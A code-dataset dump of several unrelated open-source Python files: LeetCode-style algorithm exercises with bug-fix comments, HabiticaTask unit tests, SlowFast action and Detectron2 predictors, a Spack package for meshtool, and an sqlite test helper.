# 2 1 3 k / (n-1)! is the bucket that n digit in, which is the sequence of available nums[].
# 2 3 1 Or that is to say, it is the (n-1)! permuation times we loop through the nums
# 3 1 2 So every time we get a num from nums, we need to pop it.
# 3 2 1 nums[] has two important attributes:
# 1. means the available nums we have. 2. Sequence, the order of the nums.
# So we can change the nums to whatever we want, or even use reverse order.
def perm_seq(n, k):
    # 111. Permutation Sequence: the k-th (1-based) permutation of the
    # digits "12...n". Per the bucket explanation above: with (n-1)!
    # permutations per leading digit, k // (n-1)! selects the digit and
    # k %= (n-1)! recurses into that bucket.
    # BUG FIX: `/` is float division under Python 3; both the factorial
    # update and the bucket index require floor division.
    num = []            # still-available digits, ascending
    res = ''
    total = 1
    for i in range(1, n + 1):
        num.append(str(i))
        total *= i      # total == n! after this loop
    k -= 1              # switch to 0-based rank
    while n > 0:
        total //= n     # (n-1)!: size of each leading-digit bucket
        i = k // total
        k %= total
        res += num[i]
        num.pop(i)      # that digit is used up
        n -= 1
    return res
# Used for testing
# print 'Start: n = ', n,', i = ', i, ', k = ', k,', total = ', total, ', res = ', res, ', num = ', num
# print 'n = ', n,', i = ', i, ', k = ', k,', total = ', total, ', res = ', res, ', num = ', num
# 112. Clone Graph
# Don't know why didn't pass
def cloneGraph(self, node):
    # 112. Clone Graph: deep-copy the undirected graph reachable from node.
    # BUG FIX (the "don't know why didn't pass"): the original created a
    # brand-new UndirectedGraphNode every time it met a neighbor, so a node
    # reached through two different edges was duplicated instead of shared,
    # and cycles were never closed. Keep a single old-node -> clone mapping
    # and reuse it.
    if node is None:
        return None
    clone_of = {node: UndirectedGraphNode(node.label)}
    clone_of[node].neighbors = []
    queue = collections.deque([node])
    while len(queue) > 0:
        old = queue.popleft()
        for neighbor in old.neighbors:
            if neighbor not in clone_of:
                clone_of[neighbor] = UndirectedGraphNode(neighbor.label)
                clone_of[neighbor].neighbors = []
                queue.append(neighbor)   # enqueue each old node exactly once
            clone_of[old].neighbors.append(clone_of[neighbor])
    return clone_of[node]
# 113. Maximal Rectangle
def max_rec():
    # TODO: 113. Maximal Rectangle — unimplemented placeholder.
    pass
# 114. Implement strStr()
# This is the final KMP way
def strStr(haystack, needle):
    # 114. Implement strStr() with C semantics: return the suffix of
    # haystack starting at the first occurrence of needle, None when absent,
    # and the whole haystack for an empty needle.
    H = len(haystack)
    N = len(needle)
    if N == 0:
        return haystack
    i = 0
    while i < H-N+1:
        if haystack[i] == needle[0]:
            # `start` remembers the first LATER recurrence of needle[0]
            # inside the matched window, so a failed match can restart
            # there instead of at i+1 (a light KMP-style skip; positions
            # between i+1 and start carry no needle[0], so none is missed).
            start = None # Use None here
            j = 1
            while j < N:
                if haystack[i+j] != needle[j]:
                    break
                elif start is None and haystack[i+j] == needle[0]: # Find first dup occurance
                    start = i+j
                j += 1
            if j == N:
                # Full match beginning at i.
                return haystack[i:]
            if start is not None:
                i = start - 1 # Detail, need to check start - 1
        i+=1
    return None
"""
Definetly wrong
def strstr(haystack, needle):
N = len(haystack)
H = len(needle)
while True:
startStack = 0
startNeedle = 0
while haystack[startStack] == needle[startNeedle] and startNeedle < H:
startStack += 1
startNeedle += 1
if startNeedle == H:
return haystack
if startStack == N:
return None
return None
# KMP way
def strStr(haystack, needle):
if len(needle) == 0:
return None
start = 0
H = len(haystack)
N = len(needle)
while True:
if H - start < N:
return None
if haystack[start] == needle[0]:
tmp_start = None
i = 1
while i < N and heystack[start+i] == needle[i]:
if tmp_start is None and heystack[start+i] == needle[0]:
temp_start = start + i
i += 1
if i == N -1:
return haystack
if tmp_start is not None:
start = tmp_start - 1
start += 1
"""
# 115. Longest Palindromic Substring
# Check each point, has aba and abba two possibilities.
# O(N2) time and O(1) space
def longest_palin_str(s):
    """Length of the longest palindromic substring of s.

    Every palindrome has a center: a character (odd length) or a gap
    between two characters (even length). Expand around each possible
    center — O(n^2) time, O(1) extra space.
    """
    if len(s) == 0:
        return 0
    if len(s) == 1:
        return 1
    best = 1
    for center in range(len(s) - 1):
        odd = expand_palin(s, center, center)          # e.g. "aba"
        even = expand_palin(s, center, center + 1)     # e.g. "abba"
        best = max(best, len(odd), len(even))
    return best

def expand_palin(s, l, r):
    """Grow outward from the seed span [l, r] while both ends match and
    return the widest palindrome found (possibly the empty string)."""
    while l >= 0 and r < len(s) and s[l] == s[r]:
        l -= 1
        r += 1
    return s[l+1:r]
# 116. Sudoku Solver
def sudoku_solver(board):
    # 116. Sudoku Solver: fill every '.' cell of the 9x9 board (a list of
    # lists of one-character strings) in place by backtracking.
    solver(board, 0, 0)

def solver(board, row, col):
    # Try each legal digit in the next empty cell at or after (row, col);
    # return True once the whole board is consistently filled.
    (crow, ccol) = getNextEmpty(board, row, col)
    if crow == 9:
        return True                    # ran off the board: solved
    for num in getAvailable(board, crow, ccol):
        board[crow][ccol] = num
        if solver(board, crow, ccol):
            return True
        board[crow][ccol] = '.'        # undo and try the next digit
    return False

def getNextEmpty(board, row, col):
    # First '.' cell scanning row-major from (row, col); row == 9 means
    # there is none left.
    while row < 9 and board[row][col] != '.':
        if col + 1 == 9:
            row = row + 1
        col = (col + 1) % 9
    return (row, col)

def getAvailable(board, row, col):
    # Digits (as one-character strings) still legal at (row, col).
    # BUG FIXES: the original appended box cells to the undefined name
    # `available` (NameError), never subtracted the occupied digits from
    # anything, and `row/3` is a float (invalid index) under Python 3.
    occupied = set()
    for i in range(9):
        if board[row][i] != '.':
            occupied.add(board[row][i])          # same row
        if board[i][col] != '.':
            occupied.add(board[i][col])          # same column
        # i-th cell of the 3x3 box containing (row, col).
        box_row = (row // 3) * 3 + i // 3
        box_col = (col // 3) * 3 + i % 3
        if board[box_row][box_col] != '.':
            occupied.add(board[box_row][box_col])
    return [d for d in '123456789' if d not in occupied]
# 117. Largest Rectangle in Histogram
# O(n2) way to do this
def lar_rec_histo(histo):
    # 117. Largest Rectangle in Histogram, O(n^2) version. Rectangles are
    # only scored at "peak" positions (where the next bar is not taller),
    # because the best rectangle always ends at such a position.
    # BUG FIX: the inner loop starts at i-1, so the width-1 rectangle made
    # of bar i alone was never considered (e.g. [5] returned 0).
    N = len(histo)
    maxV = 0
    for i in range(N):
        if i < N-1 and histo[i] < histo[i+1]:
            continue                      # not a peak: a later i dominates
        min_height = histo[i]
        maxV = max(maxV, min_height)      # the single bar i by itself
        for j in range(i-1, -1, -1):
            # Extend leftwards; the rectangle height is the minimum bar.
            min_height = min(histo[j], min_height)
            maxV = max(min_height * (i-j+1), maxV)
    return maxV
def lar_rec_histo(histo):
    # O(n) monotonic-stack version (shadows the O(n^2) one above; the
    # original left this as `pass` with "KAN BU DONG" — can't understand).
    # The stack keeps indices of bars with strictly increasing heights.
    # When a bar not taller than the stack top arrives, every taller bar on
    # the stack has found its right boundary and can be scored.
    ext = histo + [0]          # height-0 sentinel flushes the stack at the end
    stack = []                 # indices into ext, heights increasing
    maxV = 0
    for i, h in enumerate(ext):
        while stack and ext[stack[-1]] >= h:
            height = ext[stack.pop()]
            # Width runs from just after the previous lower bar up to i-1.
            width = i if not stack else i - stack[-1] - 1
            maxV = max(maxV, height * width)
        stack.append(i)
    return maxV
# KAN BU DONG
# 118. Spiral Matrix
# Need to check the diff in the future
def spiral_matrix(matrix):
    # 118. Spiral Matrix: all elements in clockwise spiral order.
    # BUG FIXES: the left-column loop used `range(imax, imin-1)` with the
    # default +1 step, so it never ran at all; and the `>=` break checks
    # stopped one layer too early (single rows/columns were dropped).
    # The layer bounds are shrunk after each side is consumed, and the
    # bottom/left sides are skipped when the layer has collapsed.
    if not matrix or not matrix[0]:
        return []
    imin, imax = 0, len(matrix) - 1
    jmin, jmax = 0, len(matrix[0]) - 1
    res = []
    while imin <= imax and jmin <= jmax:
        for j in range(jmin, jmax + 1):          # top row, left -> right
            res.append(matrix[imin][j])
        imin += 1
        for i in range(imin, imax + 1):          # right column, top -> bottom
            res.append(matrix[i][jmax])
        jmax -= 1
        if imin <= imax:
            for j in range(jmax, jmin - 1, -1):  # bottom row, right -> left
                res.append(matrix[imax][j])
            imax -= 1
        if jmin <= jmax:
            for i in range(imax, imin - 1, -1):  # left column, bottom -> top
                res.append(matrix[i][jmin])
            jmin += 1
    return res
# 119. Insert Interval
# No need to do the same thing as website. This is pretty good. Just remember to check the last element
def insert_interval(int_list, insert):
    # 119. Insert Interval: insert `insert` into the sorted,
    # non-overlapping `int_list`, merging any overlaps; returns a new list.
    # BUG FIX: the original removed an interval from int_list twice when
    # `insert` was nested inside it (both endpoint tests fired), raising
    # ValueError; e.g. insert_interval([[1,5]], [2,3]).
    res = []
    lo, hi = insert[0], insert[1]
    i = 0
    N = len(int_list)
    # Intervals entirely before the new one.
    while i < N and int_list[i][1] < lo:
        res.append(int_list[i])
        i += 1
    # Absorb every interval overlapping [lo, hi].
    while i < N and int_list[i][0] <= hi:
        lo = min(lo, int_list[i][0])
        hi = max(hi, int_list[i][1])
        i += 1
    res.append([lo, hi])
    # Intervals entirely after the new one.
    res.extend(int_list[i:])
    return res
# 120. Merge Interval
# Tai ji ba jian dan le
def merge_interval(intervals):
    # 120. Merge Intervals: merge all overlapping intervals.
    # BUG FIXES: the original crashed on an empty input (intervals[0]) and
    # silently assumed the input was already sorted by start — the problem
    # does not guarantee that. (The unused prev_end variable is dropped.)
    if not intervals:
        return []
    intervals = sorted(intervals)
    res = []
    prev = intervals[0]
    for cur in intervals[1:]:
        if cur[0] > prev[1]:
            res.append(prev[:])      # disjoint: flush the accumulator
            prev = cur
        else:
            # Overlapping/touching: extend (starts are sorted, so only the
            # end can grow).
            prev = [prev[0], max(prev[1], cur[1])]
    res.append(prev[:])
    return res
# 121. Word Break
# Return True but not list
# This is O(n2) way, use dp can be less
def word_break(rest_word, diction):
    # 121. Word Break: True when rest_word can be segmented into words from
    # diction (any container supporting `in`).
    # BUG FIXES: the original called the undefined `word_break_helper` with
    # an undefined `res`, and returned the FIRST matching prefix's result
    # directly, so it never tried longer prefixes (e.g. "ab" with
    # {"a", "ab"} came back False).
    N = len(rest_word)
    if N == 0:
        return True
    for i in range(1, N + 1):
        # Keep searching other prefixes when the recursive attempt fails.
        if rest_word[:i] in diction and word_break(rest_word[i:], diction):
            return True
    return False
# 122. Restore IP Addresses
def restore_ip(ip):
    # 122. Restore IP Addresses: every way to split the digit string `ip`
    # into four valid octets; each result is a list of four ints.
    ret = []
    restore_ip_helper(ret, [], ip)
    return ret

def restore_ip_helper(ret, res, rest_ip):
    # BUG FIX: the original rejected num == 0 outright, so any address with
    # a zero octet ("0.0.0.0", "1.0.1.0", ...) was never produced. A lone
    # "0" octet is legal; what is illegal is a LEADING zero ("00", "012").
    if len(res) == 4:
        if len(rest_ip) == 0:
            ret.append(res[:])     # used all four octets and all digits
        return
    for i in range(min(3, len(rest_ip))):   # an octet is 1-3 digits
        seg = rest_ip[:i+1]
        if i > 0 and seg[0] == '0':
            break                  # leading zero: longer slices only worsen
        num = int(seg)
        if num > 255:
            break                  # and so would every longer slice
        res.append(num)
        restore_ip_helper(ret, res, rest_ip[i+1:])
        res.pop()
# Used for debug print 'num = ', num, 'rest_ip = ', rest_ip, 'res = ', res, 'i = ', i
# 123. Multiply Strings
def mult_str():
    # TODO: 123. Multiply Strings — unimplemented placeholder.
    pass
# 124. Sort List
# Need to take a deeper look into the merge sort
def sort_list(head):
    # 124. Sort List entry point: merge-sort a singly linked list.
    # BUG FIXES: the original line ended in a stray colon (a SyntaxError)
    # and passed the getLength FUNCTION object instead of the computed
    # length of the list.
    return sort_linked_list(head, getLength(head))
def sort_linked_list(head, N):
    # Merge-sort the N-node list starting at head and return its sorted head.
    # BUG FIX: the original "consumed" nodes by rebinding its LOCAL `head`
    # inside the N == 1 case, but Python cannot advance the caller's
    # pointer, so the second recursive call re-sorted the very same nodes.
    # Split the list physically in the middle before recursing instead.
    if N == 0:
        return None
    if N == 1:
        head.next = None       # detach so merging cannot run past this node
        return head
    half = N // 2
    tail = head
    for _ in range(half - 1):  # tail becomes the half-th node
        tail = tail.next
    second = tail.next
    tail.next = None           # physically split into two sublists
    head1 = sort_linked_list(head, half)
    head2 = sort_linked_list(second, N - half)
    return merge_list(head1, head2)
def merge_list(head1, head2):
    # Standard two-way merge of two sorted linked lists; reuses the input
    # nodes (no allocation beyond the dummy) and returns the merged head.
    dummy = Node(0)
    current = dummy
    while head1 is not None and head2 is not None:
        if head1.data < head2.data:
            current.next = head1
            head1 = head1.next
        else:
            current.next = head2
            head2 = head2.next
        current = current.next
    # At most one list still has nodes; append it wholesale.
    if head1 is not None:
        current.next = head1
    if head2 is not None:
        current.next = head2
    return dummy.next
def getLength(head):
    """Number of nodes in the linked list starting at head (0 for None)."""
    count = 0
    node = head
    while node is not None:
        node = node.next
        count += 1
    return count
# 125. Binary Tree Maximum Path Sum
def bt_max_path_sum(root):
    # 125. Binary Tree Maximum Path Sum: best sum over any path (it may
    # bend once at a node); at least one node is used.
    # BUG FIX: the original threaded the running best through an int
    # parameter, but ints are immutable in Python — the helper's
    # `res = max(...)` only rebound a local, so the caller always returned
    # its initial 0. The best is now held in a one-element list the closure
    # can mutate.
    if root is None:
        return 0
    best = [float('-inf')]

    def down(node):
        # Best path that starts at `node` and goes straight down ONE side;
        # negative child contributions are dropped entirely.
        if node is None:
            return 0
        left = max(down(node.left), 0)
        right = max(down(node.right), 0)
        # A complete path may bend at `node`, joining both children.
        best[0] = max(best[0], node.data + left + right)
        return node.data + max(left, right)

    down(root)
    return best[0]
# 126. Reorder List
def reorder_list(head):
    # 126. Reorder List: L0->L1->...->Ln becomes L0->Ln->L1->Ln-1->... in
    # place. Find the middle, reverse the second half by head insertion,
    # then weave the two halves together (see "Way to think" note below).
    # BUG FIX: the original signature took no parameters, so every use of
    # `head` raised NameError; the list to reorder must be passed in.
    if head is None or head.next is None:
        return
    slow = head
    fast = head.next.next # Let fast go one more round first then we don't need mid
    while fast is not None and fast.next is not None:
        slow = slow.next
        fast = fast.next.next
    if fast is not None:
        slow = slow.next
    mid = slow
    # Reverse mid.next..tail by repeatedly head-inserting after mid.
    cur = mid.next
    while cur.next is not None:
        move = cur.next
        cur.next = move.next
        move.next = mid.next
        mid.next = move
    # Merge: after each left-half node, splice in the next reversed node.
    left = head # Start to merge two lists
    while left != mid: # Ends when left = mid
        right = mid.next
        mid.next = right.next
        right.next = left.next
        left.next = right
        left = right.next
# Way to think:
# If we loop the list all the time, it will exceed the time limit
# So just find the second half, reverse the second half, and merge it with the first half, that's done
"""This way should work, but will exceed the time limit
def reorderList(self, head):
while head is not None:
tail = head
prev = tail
while tail.next is not None:
prev = tail
tail = tail.next
if prev == tail:
return
prev.next = None
tail.next = head.next
head.next = tail
head = tail.next
"""
# 127. Regular Expression Matching
def regex_matching():
    # NOTE: problems 127-146 below are unimplemented placeholders that were
    # left as TODOs; each returns None.
    pass
# 128. Word Search
def word_search():
    pass
# 129. Simplify Path
def simplify_path():
    pass
# 130. Evaluate Reverse Polish Notation
def evalu_reverse_pon():
    pass
# 131. Longest Valid Parentheses
def longest_valid_parentheses():
    pass
# 132. Two Sum
def two_sum():
    pass
# 133. Interleaving String
def interleaving_string():
    pass
# 134. Substring With Concatenation of All Words
def sub_with_con_all_words():
    pass
# 135. Candy
def candy():
    pass
# 136. PalinDrome Partitioning II
def palin_partition_ii():
    pass
# 137. Minimum Window Substring
def min_window_sub():
    pass
# 138. Word Ladder
def word_ladder():
    pass
# 139. Median of Two Sorted Arrays
def med_of_two_arrarys():
    pass
# 140. 3 Sum
def three_sum():
    pass
# 141. Decode Ways
def decode_ways():
    pass
# 142. Divide Two Integers
def divide_two_integers():
    pass
# 143. Word Break II
def word_break_ii():
    pass
# 144. String to Integer (atoi):
def atoi():
    pass
# 145. Surrounded Regions
def surrounded_regions():
    pass
# 146. Text Justification
def text_justi():
    pass
# 147. Reverse Words in a String
# Using python is too simple
def reverse_words_in_str(str):
    """Whitespace-separated words of `str` in reverse order, joined by
    single spaces (leading/trailing/repeated whitespace collapses)."""
    return ' '.join(reversed(str.split()))
def reverse_words_in_str(str):
    """Manual character-scan version (shadows the one-liner above): collect
    each space-delimited word and prepend it to the result as it completes,
    so the words come out in reverse order with single-space separators."""
    def prepend(word, acc):
        # Put `word` in front of `acc`, adding a separator only when acc
        # already holds something.
        return word + (' ' + acc if acc else acc)

    out = ''
    current = ''
    for ch in str:
        if ch != ' ':
            current += ch
        elif current:
            out = prepend(current, out)
            current = ''
    if current:                 # flush a trailing word
        out = prepend(current, out)
    return out
# 148. LRU Cache
def lru_cache():
    # NOTE: problems 148-152 below are unimplemented placeholders.
    # (This module-level name also collides with functools.lru_cache if the
    # module were ever star-imported alongside it.)
    pass
# 149. Wildcard Matching
def wildcard_matching():
    pass
# 150. Valid Number
def valid_number():
    pass
# 151. Max Points on a Line
def max_points_line():
    pass
# 152. Word Ladder II
def word_ladder_ii():
    pass
if __name__ == '__main__':
#num_list = [1,2,3,4,5,6,7,8,9,10,2,3,4,5,6,7,8,9,10]
#print single_number(num_list)
#print reverse_int(131)
#print unique_bst(4)
#num_list = [1,3,5,7,9,10]
#target = 3
#print search_insert_position_1(num_list, target)
#print search_insert_position(num_list, target, 0, len(num_list)-1)
#print roman_2_integer('MCMLIVx')
#print pascal_triangle(5)
"""
This is way fucking too easy. Why people want to use swap the real nodes?
head = Node(1)
head.next = Node(2)
head.next.next = Node(5)
head.next.next.next = Node(3)
head.next.next.next.next = Node(10)
print_list(head)
swap_nodes(head)
print 'shit'
print_list(head)
"""
# Note for todo:
"""
1. check the best way to implement reverse_int. This is not a clever one
Not Understand yet:
16. Single Number II
19. Merge Sorted List
27. GrayCode
Not Done yet:
103 Copy List with Random Pointer
113 and 117 Both Rec Graph
123 Multiply Strings
"""
| 26.640831 | 122 | 0.537223 |
795460823556b9e43ad6d9c18d3cacbc2ce2910c | 2,578 | py | Python | scriptabit/tests/test_habitica_task.py | luqiang21/scriptabit | 0d0cf71814e98954850891fa0887bdcffcf7147d | [
"Apache-2.0"
] | 9 | 2016-09-04T07:02:20.000Z | 2021-06-29T07:29:40.000Z | scriptabit/tests/test_habitica_task.py | luqiang21/scriptabit | 0d0cf71814e98954850891fa0887bdcffcf7147d | [
"Apache-2.0"
] | 35 | 2016-07-30T01:03:15.000Z | 2022-02-12T20:27:37.000Z | scriptabit/tests/test_habitica_task.py | luqiang21/scriptabit | 0d0cf71814e98954850891fa0887bdcffcf7147d | [
"Apache-2.0"
] | 8 | 2016-09-05T12:36:53.000Z | 2020-06-15T18:25:50.000Z | # -*- coding: utf-8 -*-
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
from builtins import *
import json
import pytest
import requests
import requests_mock
from pkg_resources import resource_filename
from scriptabit import (
HabiticaTask,
Difficulty,
CharacterAttribute,
SyncStatus)
from .fake_data import get_fake_task
def test_id():
d = get_fake_task(_id='432')[0]
task = HabiticaTask(d)
assert d['_id'] == '432'
assert task.id == '432'
def test_create_default():
task = HabiticaTask()
assert task
assert task.name == 'scriptabit todo'
assert task.difficulty == Difficulty.default
assert task.attribute == CharacterAttribute.default
def test_invalid_difficulty():
task = HabiticaTask(get_fake_task()[0])
with pytest.raises(TypeError):
task.difficulty = 'really hard'
def test_existing_difficulty():
task = get_fake_task()[0]
expected = Difficulty.hard
task['priority'] = expected.value
ht = HabiticaTask(task)
assert ht.difficulty == expected
def test_invalid_attribute():
task = HabiticaTask(get_fake_task()[0])
with pytest.raises(TypeError):
task.attribute = 'dex'
def test_valid_difficulty():
task = HabiticaTask(get_fake_task()[0])
task.difficulty = Difficulty.trivial
assert task.difficulty == Difficulty.trivial
def test_valid_attribute():
task = HabiticaTask(get_fake_task()[0])
task.attribute = CharacterAttribute.intelligence
assert task.attribute == CharacterAttribute.intelligence
def test_existing_attribute():
task = get_fake_task()[0]
expected = CharacterAttribute.constitution
task['attribute'] = expected.value
ht = HabiticaTask(task)
assert ht.attribute == expected
def test_id_readonly():
task = HabiticaTask(get_fake_task()[0])
with pytest.raises(AttributeError):
task.id = 'aeai239'
def test_init():
_id = '111'
name = 'a task'
description = 'something'
completed = True
difficulty = Difficulty.hard
attribute = CharacterAttribute.intelligence
status = SyncStatus.updated
d = get_fake_task(_id=_id, text=name, notes=description, completed=completed)[0]
a = HabiticaTask(d)
a.difficulty = difficulty
a.status = status
a.attribute = attribute
assert a.id == _id
assert a.name == name
assert a.description == description
assert a.completed == completed
assert a.difficulty == difficulty
assert a.attribute == attribute
assert a.status == status
| 26.040404 | 84 | 0.700543 |
7954612c88950b2acfc08cb70c7ff7a825db9c09 | 6,412 | py | Python | slowfast/visualization/predictor.py | Romero027/SlowFast | f4308eb1c46d88c3a41a6fb2d1fd4fad56fdd43a | [
"Apache-2.0"
] | null | null | null | slowfast/visualization/predictor.py | Romero027/SlowFast | f4308eb1c46d88c3a41a6fb2d1fd4fad56fdd43a | [
"Apache-2.0"
] | null | null | null | slowfast/visualization/predictor.py | Romero027/SlowFast | f4308eb1c46d88c3a41a6fb2d1fd4fad56fdd43a | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import cv2
import torch
from detectron2 import model_zoo
from detectron2.config import get_cfg
from detectron2.engine import DefaultPredictor
import slowfast.utils.checkpoint as cu
from slowfast.datasets import cv2_transform
from slowfast.models import build_model
from slowfast.utils import logging, misc
from slowfast.visualization.utils import process_cv2_inputs
logger = logging.get_logger(__name__)
class ActionPredictor:
"""
Action Predictor for action recognition.
"""
def __init__(self, cfg):
"""
Args:
cfg (CfgNode): configs. Details can be found in
slowfast/config/defaults.py
"""
# Build the video model and print model statistics.
self.model = build_model(cfg)
self.model.eval()
self.cfg = cfg
logger.info("Start loading model info")
misc.log_model_info(self.model, cfg, use_train_input=False)
logger.info("Start loading model weights")
cu.load_test_checkpoint(cfg, self.model)
logger.info("Finish loading model weights")
def __call__(self, task):
"""
Returns the prediction results for the current task.
Args:
task (TaskInfo object): task object that contain
the necessary information for action prediction. (e.g. frames, boxes)
Returns:
task (TaskInfo object): the same task info object but filled with
prediction values (a tensor) and the corresponding boxes for
action detection task.
"""
frames, bboxes = task.frames, task.bboxes
if bboxes is not None:
bboxes = cv2_transform.scale_boxes(
self.cfg.DATA.TEST_CROP_SIZE,
bboxes,
task.img_height,
task.img_width,
)
if self.cfg.DEMO.INPUT_FORMAT == "BGR":
frames = [
cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) for frame in frames
]
frames = [
cv2_transform.scale(self.cfg.DATA.TEST_CROP_SIZE, frame)
for frame in frames
]
inputs = process_cv2_inputs(frames, self.cfg)
if bboxes is not None:
index_pad = torch.full(
size=(bboxes.shape[0], 1),
fill_value=float(0),
device=bboxes.device,
)
# Pad frame index for each box.
bboxes = torch.cat([index_pad, bboxes], axis=1)
if self.cfg.NUM_GPUS > 0:
# Transfer the data to the current GPU device.
if isinstance(inputs, (list,)):
for i in range(len(inputs)):
inputs[i] = inputs[i].cuda(non_blocking=True)
else:
inputs = inputs.cuda(non_blocking=True)
if self.cfg.DETECTION.ENABLE and not bboxes.shape[0]:
preds = torch.tensor([])
else:
preds = self.model(inputs, bboxes)
if self.cfg.NUM_GPUS:
preds = preds.cpu()
if bboxes is not None:
bboxes = bboxes.cpu()
preds = preds.detach()
task.add_action_preds(preds)
if bboxes is not None:
task.add_bboxes(bboxes[:, 1:])
return task
class Detectron2Predictor:
"""
Wrapper around Detectron2 to return the required predicted bounding boxes
as a ndarray.
"""
def __init__(self, cfg):
"""
Args:
cfg (CfgNode): configs. Details can be found in
slowfast/config/defaults.py
"""
self.cfg = get_cfg()
self.cfg.merge_from_file(
model_zoo.get_config_file(cfg.DEMO.DETECTRON2_CFG)
)
self.cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = cfg.DEMO.DETECTRON2_THRESH
self.cfg.MODEL.WEIGHTS = cfg.DEMO.DETECTRON2_WEIGHTS
self.cfg.INPUT.FORMAT = cfg.DEMO.INPUT_FORMAT
self.cfg.MODEL.DEVICE = "cuda:0" if cfg.NUM_GPUS > 0 else "cpu"
logger.info("Initialized Detectron2 Object Detection Model.")
self.predictor = DefaultPredictor(self.cfg)
def __call__(self, task):
"""
Return bounding boxes predictions as a tensor.
Args:
task (TaskInfo object): task object that contain
the necessary information for action prediction. (e.g. frames, boxes)
Returns:
task (TaskInfo object): the same task info object but filled with
prediction values (a tensor) and the corresponding boxes for
action detection task.
"""
middle_frame = task.frames[len(task.frames) // 2]
outputs = self.predictor(middle_frame)
# Get only human instances
mask = outputs["instances"].pred_classes == 0
pred_boxes = outputs["instances"].pred_boxes.tensor[mask]
task.add_bboxes(pred_boxes)
return task
def draw_predictions(task, video_vis):
    """
    Draw prediction for the given task.
    Args:
        task (TaskInfo object): task object that contain
            the necessary information for visualization. (e.g. frames, preds)
            All attributes must lie on CPU devices.
        video_vis (VideoVisualizer object): the video visualizer object.
    Returns:
        frames (list of ndarray): visualized frames in the clip.
    """
    boxes = task.bboxes
    frames = task.frames
    preds = task.action_preds
    if boxes is not None:
        # Boxes were predicted on the test-crop-sized frames; map them back
        # to the original image resolution before drawing.
        img_width = task.img_width
        img_height = task.img_height
        boxes = cv2_transform.revert_scaled_boxes(
            task.crop_size, boxes, img_height, img_width
        )
    # The keyframe is the clip's middle frame, expressed relative to the
    # displayable (non-buffer) portion of the clip.
    keyframe_idx = len(frames) // 2 - task.num_buffer_frames
    draw_range = [
        keyframe_idx - task.clip_vis_size,
        keyframe_idx + task.clip_vis_size,
    ]
    # Buffer frames belong to the previous clip and are not redrawn.
    frames = frames[task.num_buffer_frames :]
    if boxes is not None:
        # Detection task: only draw when at least one person was detected;
        # with zero boxes the frames pass through untouched.
        if len(boxes) != 0:
            frames = video_vis.draw_clip_range(
                frames,
                preds,
                boxes,
                keyframe_idx=keyframe_idx,
                draw_range=draw_range,
            )
    else:
        # Classification task: no boxes, draw clip-level predictions.
        frames = video_vis.draw_clip_range(
            frames, preds, keyframe_idx=keyframe_idx, draw_range=draw_range
        )
    # Drop the reference to the task so its frame buffers can be collected.
    del task
    return frames
79546139a51fc660c1a7b9f6a67b633a24bdf577 | 938 | py | Python | var/spack/repos/builtin/packages/meshtool/package.py | kotfic/spack | 181ac574bb14f1d31910c421a419cc3866f0bce9 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | var/spack/repos/builtin/packages/meshtool/package.py | kotfic/spack | 181ac574bb14f1d31910c421a419cc3866f0bce9 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 8 | 2021-11-09T20:28:40.000Z | 2022-03-15T03:26:33.000Z | var/spack/repos/builtin/packages/meshtool/package.py | kotfic/spack | 181ac574bb14f1d31910c421a419cc3866f0bce9 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack.package import *
class Meshtool(MakefilePackage):
    """Meshtool - A mesh manipulation utility"""

    homepage = "https://bitbucket.org/aneic/meshtool/"
    git = "https://bitbucket.org/aneic/meshtool.git"

    maintainers = ['MarieHouillon']

    version('master', branch='master')
    # Version to use with openCARP releases
    # NOTE(review): all four openCARP tags below pin the same commit —
    # confirm this is intentional and not a copy/paste slip.
    version('oc9.0', commit='6c5cfbd067120901f15a04bf63beec409bda6dc9')
    version('oc8.2', commit='6c5cfbd067120901f15a04bf63beec409bda6dc9')
    version('oc8.1', commit="6c5cfbd067120901f15a04bf63beec409bda6dc9")
    version('oc7.0', commit="6c5cfbd067120901f15a04bf63beec409bda6dc9")

    def install(self, spec, prefix):
        # The Makefile build leaves the `meshtool` binary in the source
        # directory; copy it into the installation prefix by hand.
        mkdirp(prefix.bin)
        install('meshtool', prefix.bin)
| 34.740741 | 73 | 0.727079 |
7954620ffeeda58ad2f05c0ec16a386e57e50abc | 532 | py | Python | tests/util/db_connection.py | zcomputerwiz/shamrock-blockchain | 2e2d8a134f0147379812085543ac98f37ce28c2b | [
"Apache-2.0"
] | null | null | null | tests/util/db_connection.py | zcomputerwiz/shamrock-blockchain | 2e2d8a134f0147379812085543ac98f37ce28c2b | [
"Apache-2.0"
] | null | null | null | tests/util/db_connection.py | zcomputerwiz/shamrock-blockchain | 2e2d8a134f0147379812085543ac98f37ce28c2b | [
"Apache-2.0"
] | null | null | null | from pathlib import Path
from shamrock.util.db_wrapper import DBWrapper
import tempfile
import aiosqlite
class DBConnection:
    """Async context manager yielding a DBWrapper over a throwaway sqlite file."""

    async def __aenter__(self) -> DBWrapper:
        # Borrow a unique temp-file name, then make sure nothing is sitting
        # at that path before aiosqlite creates the database there.
        temp_name = tempfile.NamedTemporaryFile().name
        self.db_path = Path(temp_name)
        if self.db_path.exists():
            self.db_path.unlink()
        self.connection = await aiosqlite.connect(self.db_path)
        return DBWrapper(self.connection)

    async def __aexit__(self, exc_t, exc_v, exc_tb):
        # Close the connection first, then remove the backing database file.
        await self.connection.close()
        self.db_path.unlink()
| 29.555556 | 63 | 0.701128 |
7954626ad26aaad60a35b3f497e787dfdd30c578 | 684 | py | Python | OOP5.py | PRASAD-DANGARE/PYTHON | 36214f7dc3762d327e5a29e40752edeb098249c8 | [
"MIT"
] | 1 | 2021-06-07T07:55:28.000Z | 2021-06-07T07:55:28.000Z | OOP5.py | PRASAD-DANGARE/PYTHON | 36214f7dc3762d327e5a29e40752edeb098249c8 | [
"MIT"
] | null | null | null | OOP5.py | PRASAD-DANGARE/PYTHON | 36214f7dc3762d327e5a29e40752edeb098249c8 | [
"MIT"
] | null | null | null | '''
Description : Demonstration of Characteristics of Class
